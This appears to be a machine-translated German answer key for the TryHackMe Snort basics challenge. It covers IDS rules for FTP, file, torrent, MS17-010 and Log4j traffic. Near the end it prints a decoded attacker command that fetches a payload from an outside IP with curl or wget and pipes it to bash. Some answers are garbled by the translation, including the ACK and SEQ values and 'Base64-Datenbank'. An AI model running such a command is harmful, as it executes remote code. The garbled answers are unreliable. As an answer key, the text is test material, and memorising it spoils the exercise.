Wir haben die Verwendung von Snort zur Analyse des FTP- und HTTP-Verkehrs durch Erstellen und Konfigurieren der entsprechenden Regeln behandelt. Um das Gelernte anzuwenden, haben wir vorhandene Netzwerkaufzeichnungen mit Snort analysiert, um die erstellten Regeln zu testen und Verkehrsmuster zu erkennen. Dies war Teil von TryHackMe Snort Challenge – Die Grundlagen.

Snort-Studiennotizen

Vollständiger Splunk SIEM-Kurs mit praktischen Szenarien

Höhepunkte

SNORT ist ein regelbasiertes Open-Source-System zur Erkennung und Verhinderung von Angriffen auf Netzwerke (NIDS/NIPS). Es wurde von Martin Roesch, Open-Source-Mitwirkenden und dem Cisco Talos-Team entwickelt und wird auch weiterhin von ihnen gepflegt. 
Fähigkeiten von Snort

  • Live-Verkehrsanalyse
  • Angriffs- und Sondenerkennung
  • Paketprotokollierung
  • Protokollanalyse
  • Echtzeit-Alarmierung
  • Module & Plugins
  • Präprozessoren
  • Plattformübergreifende Unterstützung! (Linux und Windows)

Snort IDS-Betriebsmodi

  • Sniffer-Modus – Lesen Sie IP-Pakete und geben Sie sie in der Konsolenanwendung ein.
  • Paketlogger-Modus – Protokollieren Sie alle IP-Pakete (eingehend und ausgehend), die das Netzwerk besuchen.
  • NIDS- und NIPS-Modi: Protokollieren/löschen Sie die Pakete, die gemäß den benutzerdefinierten Regeln als bösartig eingestuft werden

Raum-Antworten | Snort-Challenge – Die Grundlagen

Wie hoch ist die Anzahl der erkannten Pakete?

Notiz: Sie müssen diese Frage richtig beantworten, bevor Sie die restlichen Fragen in dieser Aufgabe beantworten.

328

Untersuchen Sie die Protokolldatei.

Was ist die Zieladresse von Paket 63?

145.254.160.237

Untersuchen Sie die Protokolldatei.

 Was ist die ACK-Nummer von Paket 64?

Version:

Untersuchen Sie die Protokolldatei.

Was ist die SEQ-Nummer von Paket 62?

Version:

B

Untersuchen Sie die Protokolldatei.

Was ist die TTL von Paket 65?

128

Untersuchen Sie die Protokolldatei.

Was ist die Quell-IP von Paket 65?

145.254.160.237

Untersuchen Sie die Protokolldatei.

Was ist der Quellport von Paket 65?

3372

Verwenden Sie die angegebene PCAP-Datei.

Schreiben Sie Regeln zur Erkennung von „alle TCP-Port 21“-Verkehr im angegebenen PCAP.

Wie hoch ist die Anzahl der erkannten Pakete?

614

Untersuchen Sie die Protokolldatei.

Wie lautet der Name des FTP-Dienstes?

Microsoft FTP-Dienst

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Alte Regeln deaktivieren/kommentieren.

Schreiben Sie eine Regel zum Erkennen fehlgeschlagener FTP-Anmeldeversuche im angegebenen PCAP.

Wie hoch ist die Anzahl der erkannten Pakete?

41

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Alte Regel deaktivieren/kommentieren.

Schreiben Sie eine Regel zum Erkennen erfolgreicher FTP-Anmeldungen im angegebenen PCAP.

Wie hoch ist die Anzahl der erkannten Pakete?

1

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Alte Regel deaktivieren/kommentieren.

Schreiben Sie eine Regel zur Erkennung von Fehlern FTP Anmeldeversuche mit einem gültigen Benutzernamen, aber einem falschen oder keinem Passwort.

Wie hoch ist die Anzahl der erkannten Pakete?

42

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Alte Regel deaktivieren/kommentieren.

Schreiben Sie eine Regel zur Erkennung von Fehlern FTP Anmeldeversuche mit dem Benutzernamen „Administrator“, aber einem falschen oder keinem Passwort.

Wie hoch ist die Anzahl der erkannten Pakete?

7

Navigieren Sie zum Aufgabenordner.

Verwenden Sie die angegebene PCAP-Datei.

Schreiben Sie eine Regel zum Erkennen der PNG-Datei im angegebenen PCAP.

Untersuchen Sie die Protokolle und identifizieren Sie den im Paket eingebetteten Softwarenamen.

Adobe Imagereadyq

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Alte Regel deaktivieren/kommentieren.

Schreiben Sie eine Regel zum Erkennen der GIF-Datei im angegebenen PCAP.

Untersuchen Sie die Protokolle und identifizieren Sie das im Paket eingebettete Bildformat.

GIF89a

Navigieren Sie zum Aufgabenordner.

Verwenden Sie die angegebene PCAP-Datei.

Schreiben Sie eine Regel zum Erkennen der Torrent-Metadatei im angegebenen PCAP.

 Wie hoch ist die Anzahl der erkannten Pakete?

2

Untersuchen Sie die Protokoll-/Alarmdateien.

Wie heißt die Torrent-Anwendung?

BitTorrent

Untersuchen Sie die Protokoll-/Alarmdateien.

Was ist der MIME-Typ (Multipurpose Internet Mail Extensions) der Torrent-Metadatei?

Anwendung/x-bittorrent

Untersuchen Sie die Protokoll-/Alarmdateien.

Wie lautet der Hostname der Torrent-Metadatei?

tracker2.torrentbox.com

In diesem Abschnitt müssen Sie die Syntaxfehler in den angegebenen Regeldateien beheben. 

Sie können jeden Regelsatz mit der folgenden Befehlsstruktur testen;

sudo snort -c local-X.rules -r mx-1.pcap -Eine Konsole

Beheben Sie den Syntaxfehler in der Datei „local-1.rules“ und sorgen Sie für einen reibungslosen Betrieb.

Wie hoch ist die Anzahl der erkannten Pakete?

16

Beheben Sie den Syntaxfehler in der Datei „local-2.rules“ und sorgen Sie für einen reibungslosen Betrieb.

Wie hoch ist die Anzahl der erkannten Pakete?

68

Beheben Sie den Syntaxfehler in der Datei „local-3.rules“ und sorgen Sie für einen reibungslosen Betrieb.

Wie hoch ist die Anzahl der erkannten Pakete?

87

Beheben Sie den Syntaxfehler in der Datei „local-4.rules“ und sorgen Sie für einen reibungslosen Betrieb.

Wie hoch ist die Anzahl der erkannten Pakete?

90

Beheben Sie den Syntaxfehler in der Datei „local-5.rules“ und sorgen Sie für einen reibungslosen Betrieb.

Wie hoch ist die Anzahl der erkannten Pakete?

155

Beheben Sie den logischen Fehler in der Datei „local-6.rules“, damit die Erstellung von Warnungen reibungslos funktioniert.

Wie hoch ist die Anzahl der erkannten Pakete?

2

Beheben Sie den logischen Fehler in der Datei „local-7.rules“, damit die Erstellung von Warnungen reibungslos funktioniert.

Wie heißt die gewünschte Option:

Nachricht

Navigieren Sie zum Aufgabenordner.

Verwenden Sie die angegebene PCAP-Datei.

Verwenden Sie die angegebene Regeldatei (local.rules), um den ms1710-Exploit zu untersuchen.

Wie hoch ist die Anzahl der erkannten Pakete?

25154

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Verwenden Sie die leere Datei local-1.rules, um eine neue Regel zum Erkennen von Nutzdaten zu schreiben, die das Schlüsselwort „\IPC$“ enthalten.

Wie hoch ist die Anzahl der erkannten Pakete?

12

Untersuchen Sie die Protokoll-/Alarmdateien.

Was ist der angeforderte Pfad?

\192.168.116.138\IPC$

Wie hoch ist der CVSS v2-Score der Sicherheitslücke MS17-010?

9.3

Verwenden Sie die angegebene PCAP-Datei.

Verwenden Sie die angegebene Regeldatei (local.rules), um den Log4j-Ausnutzvorgang zu untersuchen.

Wie hoch ist die Anzahl der erkannten Pakete?

26

Untersuchen Sie die Protokoll-/Alarmdateien.

Wie viele Regeln wurden ausgelöst?

4

Untersuchen Sie die Protokoll-/Alarmdateien.

Was sind die ersten sechs Ziffern der ausgelösten Regel-Seiten?

210037

Löschen Sie die vorherigen Protokoll- und Alarmdateien.

Verwenden Sie die leere Datei local-1.rules, um eine neue Regel zum Erkennen von Paketnutzdaten zu schreiben zwischen 770 und 855 Bytes.

Wie hoch ist die Anzahl der erkannten Pakete?

41

Untersuchen Sie die Protokoll-/Alarmdateien.

Was ist der Name des verwendeten Kodierungsalgorithmus?

Base64-Datenbank

Untersuchen Sie die Protokoll-/Alarmdateien.

Was ist die IP-ID des entsprechenden Pakets?

62808

Untersuchen Sie die Protokoll-/Alarmdateien.

Dekodieren Sie den kodierten Befehl.

Was ist der Befehl des Angreifers?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

Wie hoch ist der CVSS v2-Score der Log4j-Sicherheitslücke?

9.3

Video-Komplettlösung | TryHackMe Snort Challenge – Die Grundlagen

, , ,
Anmerkungen anzeigen

Motasem

Über den Autor

Ich erstelle Notizen zur Cybersicherheit, Notizen zum digitalen Marketing und Online-Kurse. Ich biete auch Beratung zum digitalen Marketing an, einschließlich, aber nicht beschränkt auf SEO, Google- und Meta-Anzeigen und CRM-Verwaltung.

Artikel anzeigen